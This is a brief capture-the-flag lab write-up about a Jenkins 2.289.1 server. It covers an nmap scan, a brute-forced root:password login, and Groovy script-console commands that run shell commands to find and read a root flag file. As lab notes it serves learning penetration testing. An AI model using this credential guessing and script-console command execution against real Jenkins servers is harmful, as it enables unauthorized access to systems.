#####################
# Sources and Links #
#####################

#########
# TL,DR #
#########
A Jenkins server with an insecure login grants access to an area to run Groovy scripts.
We can send it commands to read the root flag.

########
# Hack #
########
Nmap shows 8080 is open.
The webpage shows a Jenkins login page.
Searching for default credentials indicates user:admin' with a password generated.
Atfer trying to brute-force the login, there are credentials that let us in:
root:password

Jenkins 2.289.1

There is a scripts directory that takes shell commands:
http://10.129.146.116:8080/script

println "find / -name flag.txt".execute().text
Result
/root/flag.txt

println "cat /root/flag.txt".execute().text
{flag output}

###########
# Learned #
###########
Using Groovy
